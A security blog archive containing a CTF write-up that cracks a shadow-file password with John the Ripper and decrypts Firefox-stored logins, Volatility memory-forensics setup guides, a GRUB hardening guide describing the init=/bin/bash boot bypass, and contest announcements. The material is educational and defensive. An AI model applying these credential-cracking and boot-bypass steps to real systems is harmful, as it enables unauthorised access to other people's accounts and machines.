Archive

Archive for the ‘Security’ Category

ECTF 2014 Forensics 400 Help Bob writeup

October 19, 2014 2 comments

This is the question,

Message from Bob:
Hello Hacker!
I am having troubles in finding the unique flag assigned to me.
Here are some files from my system.
Could you please help me out?

They gave us the etc, sbin, and home directories. When I saw the word “unique flag” many things were going in my mind! Can it be a ssh-private key? Is there something in linux which uniquely identifies every machine or an user within the etc file? Or is it the actual challenge file are they asking for! I didn’t understand! I asked the admin in the IRC to explain the term unique flag, but he refused to do so. Then I was pasting the strings whatever I found which was looking like a md5sum, but none of them worked! I left the challenge unsolved and started looking the others. I came back to solve this challenge around 10 pm. I had my team mates sitting next to me. I was asking him to read the question and tell me what he understood. Different people will have different approach towards a problem.

He  asked me to crack the user name’s password from the shadow file. Even I saw this in the morning but I didn’t think of cracking it since password cracking consumes more time and I am very lethargic to do that. Then I tried cracking the user name bob with JTR.

➜  etc [0] john shadow                                                                                                                                                                
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 99% 1/3 0g/s 302.2p/s 302.2c/s 302.2C/s b999991930..bob999991906
Phoenix1         (bob)
1g 0:00:00:24 100% 2/3 0.04084g/s 299.1p/s 299.1c/s 299.1C/s Phoenix1..Alice1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
    Yes we have cracked the password of bob. What to do next? This is where the question’s description lacked clarity. There is no clue from this step to move anywhere. But I saw the Firefox folder inside the etc directory. I wanted to be evil for sometime. I thought of cracking the user-names and passwords of all the user’s who has been used the same browser. Yes we can find them inside the profiles directory. Last year, I designed a challenge for InCTF on password acquisition from an outdated Firefox browser
    Whenever you log into your web accounts, firefox gives you an option to save the passwords. When you give “Remember password” firefox stores them in key3.db and in signons.sqlite file, which can be found from /home/user_name/.mozilla/firefox/blab.username. The stored passwords in these files are encrypted and decrypted using the key3.db file. signons.sqlite will contain the encrypted password using the key3.db file. Mostly the encryption mechanism is 3-DES and Bas64. If you can acquire these two files from any machine then you can crack the passwords which are stored inside. Now firefox has modified it’s security mechanism by adding a Master key, which gives you double protection. If you have configured the master key in your firefox browser, then even after getting the key3.db and signon.sqlite file from your machine, no one can easily find the username and password unless they have your master-key.
    So I took the “xk3nvgis.Bob” folder from the home folder of bob and tried cracking it using the Firefox Password Viewer. It didn’t work even after configuring everything. I don’t know if the user has set the master password. I don’t know what is the master password too! So I just tried giving the bob’s password ( “Phoenix1”) which I found after cracking the shadow file. Pingo! It worked! The user bob used his login password as his master key password.!
ECTF14_bob
You can see the username and password. Go to the URL and try logging in with the cracked credentials. I didn’t check the username given there. I used like this “bob@bob.com” and password “SEED MAJOR SMOKE WORK”.  Then I logged into the webiste. Looks like the actual contest portal but it is designed specifically for this challenge. When I went inside, I didn’t find anything to get the flag. All I saw only the home page of the ECTF website again.
ECTF15_bob_login
Then I remembered something which I did the same morning. I was going through the bash history and I noticed a wget command which downloads a file from the same website where we logged in currently.
➜  bob [0] cat .bash_history
ls -la
ls
ls -la
cd ../
ls
cd bob/
ls
ls -la
firefox
ls -la
wget http://ancient-citadel-9348.herokuapp.com/giff_flag
ls cd ../
cd bob/
vim ~/.bash_profile
cd Documents
I copy pasted the same URL in my browser where we logged in as bob. Then I got this!
ECTF15_bob_final
We pwned it after struggling a lot! Only very few teams including us solved this challenge. Hey, the message of the challenge is to use ** Master Key ** if you are using Firefox. Make sure that you are configuring the master key in your firefox browser. This is how it is configured, click here.
Advertisements

Installing Linux Profile in Volatility

As I said, in my previous blog, it is necessary to note, that you need a compatible system profile to analyse a RAM memory dump.  That is, if you have a profile built for kernel 3.2.15, then you can only analyse the memory dump from a machine which runs the same kernel version 3.2.15. In case if you want to analyse some other kernel version’s RAM memory then you need to build a profile for the kernel version separately in your Volatility tool.  Before going to the building part, let me put it clearly what I meant by a profile. Actually it refers to a file ( a zip file ) where we compress the  kernel data structures and debug symbols. Volatility uses this zip file to mine critical information and to parse the objects inside the memory. In the next blog I will tell you the tools which you can use to collect the memory dumps from various OS’s and a demonstration with any one of a sample RAM memory dump. For now, I will tell you, how you can successfully build a Linux profile with your Volatility tool.

Determine your kernel version:

bios@bios-VirtualBox:~$ uname -mrs
Linux 3.13.0-24-generic x86_64

Installing a pre-requisite package:

bios@bios-VirtualBox:~$ sudo apt-get install dwarfdump

Creating vtypes:

Some of you might have encountered this issue while creating the vtypes.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux$ make
make -C //lib/modules/3.13.0-24-generic/build CONFIG_DEBUG_INFO=y M=/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.13.0-24-generic’
  CC [M]  /home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o
/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.c:70:33: fatal error: linux/net_namespace.h: No such file or directory
 #include <linux/net_namespace.h>
                                 ^
compilation terminated.
make[2]: *** [/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o] Error 1
make[1]: *** [_module_/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-3.13.0-24-generic’
make: *** [dwarf] Error 2

This is not the right way of doing this. Here is the solution, follow the steps properly.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1$ cd tools/linux

bios@bios-VirtualBox:~$ sudo chown -R bios Desktop/volatility-2.3.1/tools/linux/

 

Now make:

 

Now you should not get any errors at the end of the make.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1/tools/linux$ make

make -C //lib/modules/3.5.0-49-generic/build CONFIG_DEBUG_INFO=y M=/home/bios/Desktop/volatility-2.3.1/tools/linux modules

make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic’

CC [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.o

Building modules, stage 2.

MODPOST 1 modules

CC /home/bios/Desktop/volatility-2.3.1/tools/linux/module.mod.o

LD [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.ko

make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic’

dwarfdump -di module.ko > module.dwarf

make -C //lib/modules/3.5.0-49-generic/build M=/home/bios/Desktop/volatility-2.3.1/tools/linux clean

make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic’

CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/.tmp_versions

CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/Module.symvers

make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic’

 

Making the Profile:

 Go to the /boot directory and create a profile by zipping the kernel file.

bios@bios-VirtualBox:/boot$ ls -l

total 48888

-rw-r–r– 1 root root 848290 Jan 25 2013 abi-3.5.0-23-generic

-rw-r–r– 1 root root 853859 May 3 03:16 abi-3.5.0-49-generic

-rw-r–r– 1 root root 147880 Jan 25 2013 config-3.5.0-23-generic

-rw-r–r– 1 root root 148168 May 3 03:16 config-3.5.0-49-generic

drwxr-xr-x 3 root root 12288 May 22 10:42 grub

-rw-r–r– 1 root root 15543822 May 2 14:44 initrd.img-3.5.0-23-generic

-rw-r–r– 1 root root 15694176 May 22 10:42 initrd.img-3.5.0-49-generic

-rw-r–r– 1 root root 176764 Nov 27 2011 memtest86+.bin

-rw-r–r– 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin

-rw——- 1 root root 3023265 Jan 25 2013 System.map-3.5.0-23-generic

-rw——- 1 root root 3025898 May 3 03:16 System.map-3.5.0-49-generic

-rw-r–r– 1 root root 5189248 Aug 2 2013 vmlinuz-3.5.0-23-generic

-rw——- 1 root root 5191616 May 3 03:16 vmlinuz-3.5.0-49-generic

bios@bios-VirtualBox:~$ sudo zip Desktop/volatility-2.3.1/volatility/plugins/overlays/linux/ubuntu-12.04-amd64_3.5.0-49-generic.zip Desktop/volatility-2.3.1/tools/linux/module.dwarf /boot/System.map-3.5.0-49-generic

updating: Desktop/volatility-2.3.1/tools/linux/module.dwarf (deflated 90%)

adding: boot/System.map-3.5.0-49-generic (deflated 79%)

 

Checking the installation:

 

If everything goes smooth without any error then you are done with creating Linux profile. Hurray! Now you can check, whether everything went in your way!

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 –info | grep “linux”

Volatility Foundation Volatility Framework 2.3.1

linux_arp – Print the ARP table

linux_banner – Prints the Linux banner information

linux_bash – Recover bash history from bash process memory

linux_check_afinfo – Verifies the operation function pointers of network protocols

linux_check_creds – Checks if any processes are sharing credential structures

linux_check_evt_arm – Checks the Exception Vector Table to look for syscall table hooking

linux_check_fop – Check file operation structures for rootkit modifications

linux_check_idt – Checks if the IDT has been altered

[stripped]

You could see the plugins listed out, which confirms the building the linux profile.

 

Checking for the Linux profile version:

 

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 –info | grep “Linux”

Volatility Foundation Volatility Framework 2.3.1

linux_banner – Prints the Linux banner information

linux_yarascan – A shell in the Linux memory image

LinuxUbuntu1204x64 – A Profile for Linux Ubuntu1204 x64

Linuxubuntu-14_04-desktop-amd64_3_13_0-24-genericx64 – A Profile for Linux ubuntu-14.04-desktop-amd64_3.13.0-24-generic x64

If you face any issues while building the Linux Profile, will help you out in fixing it. Let me know through the comments.

Installing Volatility in Ubuntu

May 22, 2014 1 comment

Volatility is a memory forensics framework, to analyse ram memory dumps for Windows, Linux, and Mac. In order to analyse a operating system’s RAM memory in Volatility, you need to build the corresponding operating system’s profile. By default the Windows profile is built inside Volatility. Other than Windows, if you are analysing a Linux or a Mac memory dump, then you have to build the profiles accordingly. Most important thing to note is, you cannot build a profile for a Ubuntu 3.13 system to analyse a memory dump from Ubuntu 3.10 system. In this article, I am going to show you how you can install volatility in your machine and in the next blog I will show you how to create linux profiles to analyse Linux based RAM memory. Please see, I am using Ubuntu 12.04, amd_64. Also, install the packages in the order which is followed before. Make sure that there are no errors appearing while installing the dependencies and libraries.

[Update] You can also refer to Volatility’s github for the latest updates about dependencies.

Step 1: Installing dependencies

h1dd3ntru7h@bi0s:~$ sudo apt-get install subversion pcregrep libpcre++-dev python-dev -y

Step 2: Installing PyCrypto

You can either use pip to install the library or you can download the source from here and install.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf pycrypto-2.6.1.tar.gz

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ python  setup.py build

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ sudo python setup.py build install

Step 3: Installing Distrom

Distrom is a disassemble library for x86/AMD64. You can download the source from here.

h1dd3ntru7h@bi0s:~/Apps/distorm3$ unzip distorm3.zip

h1dd3ntru7h@bi0s:~/Apps$ cd distorm3/

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build install

Step 4: Installing Yara

Volatility supports many plugins which helps to identify malwares from memory dumps. Many plugins which are based on malwares uses Yara library. You can download the recent version availabe, but for this demo I am using the older version of the yara.

h1dd3ntru7h@bi0s:~/Apps$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$tar -zxvf yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-1.4/
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo ./configure

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make install

Step 5: Installing Yara Python

Please follow the instructions in Step 4 before installing Yara Python. You can download the Yara Python1.4a source from here. Please see, if you downloaded a different version of Yara in step 4, then do download a compatible version of Yara Python.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-python-1.4a.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-python-1.4a/

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build install

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ echo “/usr/local/lib” >> /etc/ld.so.conf
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ ldconfig

We are done with installing the dependencies, now  will install the Volatility framework. Please download the source from here. You can download and use it wherever you want. Once after downloading, extract to a directory.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build install

This will complete the installation and if everything went in the right way, then you should get a similar stdout,

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python vol.py -h
Volatility Foundation Volatility Framework 2.3.1
Usage: Volatility – A memory forensics analysis platform.

Options:
  -h, –help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  –conf-file=/home/h1dd3ntru7h/.volatilityrc
[stripped]

InCTF 2014 – National Level Ethical Hacking contest

January 28, 2014 1 comment

InCTF_header

Not a day passes when several machines are compromised and infections spread rampantly in the world today. The cyber world has witnessed several dangerous attacks including the Stuxnet virus and it’s successor Duqu. Other recent attacks include the Flame malware, which managed to disguise itself as a legitimate Windows software. It exploited a bug in Windows to obtain a certificate which allowed itself to authenticate itself as genuine Windows software. Other notable examples include rise of botnets such as the highly resilient Zeus banking trojan and the Conficker worm. There have also been instances of espionage by government agencies on one another such as the recent incident where Georgia CERT discovered a Russian hacker spying on them.

Indian websites offer little or no resistance to such security incidents. The Computer Emergency Response Team, India(Cert-In) has been tracking defacements of Indian websites amongst other security incidents. Their monthly and annual bulletins detail the various vulnerabilities and malware infections in various Indian websites. It’s really sad that with so much talent and skill, Indian websites are compromised frequently and nothing can be done to stand this wave of attacks on them.

InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic the real world security challenges. Software developers in India have little exposure to secure coding practices and the effects of not adopting such practices-one of the main reasons why systems are compromised quite easily these. Following such simple practices can help prevent such incidents.

InCTF ‘14 is from December 2013 to March 2014 and is focused exclusively on the student community. No prior exposure or experience in cyber security needed to participate.

What you need to do?
1. Form a team (minimum three and maximum five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://portal.inctf.in

Great Rewards:
20K – The winning team receives a cash prize of up to Rs. 20000/-
15K – The first runner-up team receives a cash prize of up to Rs. 15000/-
10K – The second runner-up team receives a cash prize of up to Rs. 10000/-

See Prizes for more.
Note

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!
Keep up with us
Website | Email | Facebook | Twitter | Mailing List | IRC | Google+ |

*Cash prizes are subject to their performance and participation in the CTF round. Only teams who connect to the VPN server and successfully gain points in the CTF round are eligible for prizes. In addition, cash prize winners of previous editions of InCTF and sCTF are not eligible for prizes this time. Prizes will be awarded only if all members of the team are not in final year of their education. The decision of Team InCTF is final.

Hardening Grub

January 3, 2013 1 comment

The best way to delve into others Linux machine is by editing the grub. We don’t need any passwords to get access; just edit the grub and do either of these notorious things, change the root user’s password or the user’s passwords. If  you are using your PC, for  normal or for a rough use, it’s not too necessary that you need to take stringent precautionary steps. Indeed, you have to be secure, choice is yours. A computer without security is similar to having a house without gate, doors, and fence. For some people who works in industries, banks, system administrators, security is mandatory and it is inevitable. What happens if someone keeps a trove of confidential information such as Passwords of users, Bank accounts, Personal information etc! What happens if your enemy deletes all your sedentary works, which you kept inside your PC? If your PC has two operating systems running, say Linux and Windows, then you can easily break Windows user password by bypassing the Linux grub! So i learned few methods to secure a grub recently, and i shared it. Please follow these steps, and i can usher you that, you can eliminate the aforementioned problems to some extent.

I am going to use Ubuntu Operating system for hardening! So firstly you should know the ways how people will get into the system. Many will start by, editing the line “ro quite splash” as rw init=/bin/bash during the startup(usually by pressing button “e” on the list). Second is using the recovery mode. So the solution will be, put a GRUB password for your system and disable the recovery mode. Follow the steps carefully.

Part 1: Disabling the Recovery mode

1. Get into the /etc/default directory

2. Open the grub file

shankie@ubuntu:~$ cd /etc/default/
shankie@ubuntu:/etc/default$ sudo vim grub

3. By default the recovery mode will be commented. Just uncomment the GRUB_DISABLE_RECOVERY” line to disable the recovery mode during startup. After uncommenting it will look like this.

recovery mode1

4. Save the file and update the grub

Use sudo to update the grub!

egrub7

Part 2: Setting up a Password for your grub!

1. Be a root user

2. Move into /etc/grub.d/ directory

eGrub2

Description of each file:

i. 00_header – Password Protection

ii.05_debian_theme – Set background color, text and themes

iii. 10_linux – Locates Linux kernels based on results of the “lsb_release” command

iv. 20_memtest86+ – If the file /boot/memtest86+.bin exists, it is included in the menu item.

v. 30_os-prober – Searches for OS and adds in the menu

vi. 40_custom – A template for adding custom menu entries.

3. Make a backup of the 00_header file


root@ubuntu:/etc/grub.d# cp 00_header 00_header.BKP

root@ubuntu:/etc/grub.d#

4. Creating a GRUB password


root@ubuntu:/etc/grub.d# grub-mkpasswd-pbkdf2

Enter password:

Reenter password:

Your PBKDF2 is grub.pbkdf2.sha512.10000.0DCEEC2D624BA3DBDFACF2AE311617236143EE7E930E862706D3A4089AD3A

DA1C0E1274EA0F53DC466100653C2BB164937D6D9932D90BC18F2F03C1E765389A8.F0C2399E573C9BFA6DD9107F031DE

BF9AA5C0C15531CBCEA95C31D9CDA2FEBBCBF4BEE14AFA17CED8B2BA7800DC451BA7A0B222265B2CB69D590A2B11C0CE88E

eGrub3

5. Copy Paste the output in a text file! from—-“grub.pbkdf2.sha512.1000…..”

6. Edit the 00_header file:

Type the following commands at the end of the file.  After entering the username in the third line (i.e  password pbkdf2 username ), copy paste the output which we copied in a text file.I am using my username as “h1dd3ntru7h”. Enter your username in the set superuser and password option.

cat << EOF

set superusers=”h1dd3ntru7h”

password pbkdf2 h1dd3ntru7h grub.pbkdf2.sha512.10000.0DCEEC2D624BA3DBDFACF2AE311617236143EE7E930E862706D3A4089AD3ADA1C0E1274EA0F53DC4

66100653C2BB164937D6D9932D90BC18F2F03C1E765389A8.F0C2399E573C9BFA6DD9107F031DEBF9AA5C0C15531CBCEA95C31D9

CDA2FEBBCBF4BEE14AFA17CED8B2BA7800DC451BA7A0B222265B2CB69D590A2B11C0CE88E

EOF

And it looks like this
grublast1

7. Save the file and update the grub.

egrub7

Now you are done with Part1 and Part2. Your grub is safe now. Make sure that you are not forgetting the grub password.  Reboot your system and try to edit the grub, it will prompt for username and password. Now, no one can edit the grub without the grub password which is generated by you.

index_010

InCTF’12 – National Level Ethical Hacking Contest

September 20, 2011 Leave a comment

Amrita University & TIFAC CORE

proudly present

 

 

InCTF ’12

                National Level “Capture the Flag” style ethical hacking contest. Not a day passes when several websites are compromised on a daily basis. The latest in the line of compromised websites was http://kernel.org-the home page of the Linux kernel. Several more security incidents go unreported. Security of sensitive data has several implications ranging from national security issues to defense secrets ending up in the wrong hands and much more.

                Indian websites offer little or no resistance to such security intrusions. The Computer Emergency Response Team, India(Cert-In) has been tracking de-facements of Indian websites and more. Their report can be viewed here. It’s really sad that with so much talent and skill, Indian websites are compromised frequently and nothing can be done to stand this wave of attacks on them.

                 InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic the real world security challenges. Software developers in India have little exposure to secure coding practices and the effects of not adopting such practices-one of the main reasons why systems are compromised quite easily these. Following such simple practices can help prevent such incidents.

                 InCTF ‘12 is from November 2011 to January 2012 and is focused exclusively on the student community. You can participate from your own university and no travel is required. No prior exposure or experience in cyber security needed to participate.
What you need to do?
1. Form a team (max five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://inctf.in

In addition it’s been decided that teams which finished in the top 10 places on InCTF 2011 qualify directly for the second round-they do not have to participate in the first round. Congratulations to all these teams!

Great Rewards

25K The winning team receives a cash prize of up to Rs. 25000/-
20K The first runner-up team receives a cash prize of up to Rs. 20000/-
15K The second runner-up team receives a cash prize of up to Rs. 15000/-
10K The third runner-up team receives a cash prize of up to Rs. 10000/-
5K The fourth runner-up team receives a cash prize of up to Rs. 5000/-

See http://inctf.in/prizes for more.

Special Prizes*

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!

Round One:

1. Learning Round

2.Contestants have to complete set of task ( off-line)  which will be provided within a given period.

Round Two:

1. Consist of both Off-Line and On-Line task

2.Time limit is 3 hrs

3.Top 30 members will be selected for the final round

Round Three:

1.CTF – Defend your assigned machine and attack others machine.

Registrations starts on November 1st

Keep up with us in:

      Website    Facebook    Twitter

Stuxnet

September 13, 2011 Leave a comment

Stuxnet

                Day to day, technology is becoming more sophisticated. Smaller the size greater its consequences. As an example, in June last year a computer virus called Stuxnet which is found to be lurking in the Databanks and power plants, Traffic Control Systems and Factories, around the world. This is virus is 20 times more complex than other virus. It is doesn’t have a contiguous array of capabilities. Stuxnet is a weapon which is made entirely in code. What it can do? Amazing! When I heard about its effects

  1. It turns up the pressure in the nuclear reactors,
  2. Switch off oil pipe lines and it can report that everything is normal.

It exploited the security gaps that system creators are unaware of. These security holes are known as Zero days. The zero day can be sold in the black market at the rate of 100,000$. Stuxnet took the advantage of 20 Zero days. It is not like other virus annoying to users. This virus has a specific task, without that the virus remains dormant. The International Science and International Security (ISIS) says that,

1)It can shut down 1000 centrifuges.

2)It can lead to a National Electricity Blackout.

Iran has responded to this attack for the open hackers, which is reported as the 2nd largest online army in the world. Some alleged that Israel was behind this since it contains reference to Hebrew Bible and US involved in testing and development and also by Siemen mobile company since its software has been used by Iranian regime. Evolution is fast, since nine months after its detection, the first virus that can crash 100’s of power grids or destroy oil pipelines. Just imagine, the size of the virus file and its victim’s size?

Categories: Security Tags: ,
This Week In 4n6

Your weekly roundup of Digital Forensics and Incident Response news

bi0s

CTF | Amrita

RAM Slack - Random Thoughts from a Computer Forensic Examiner

Random Thoughts from a Computer Forensic Examiner

InCTF

behind the scenes

DFIR Journal

Trials and Tribulations of a DFIR life

I dont know zilch !

For the noobs out there like me

X-Ways Forensics Practitioner's Guide

The Guide to X-Ways Forensics!

Forensic Focus - Articles

Digital forensics articles and research papers

my abbreviations......

gain,learn and share knowledge!!!!

digirati82

Windows Logging Service (WLS), DFIR, etc.

Belkasoft Forensic: The Digital Evidence Blog

Searching for, analyzing and recovering digital evidence

Gail Tredwell. Amma. Truth. Lies. Scandals. Fraud. And. Reality

Three things cannot be long hidden: the sun, the moon, and the truth.

Integriography: A Journal of Broken Locks, Ethics, and Computer Forensics

Musings about UAVs, search & rescue, computer forensics, cyber security, and the state of play in all .....

Life is beautiful

when the mind is full with love, you see beauty in every thing

Techno Krat

.... Dare To Try .......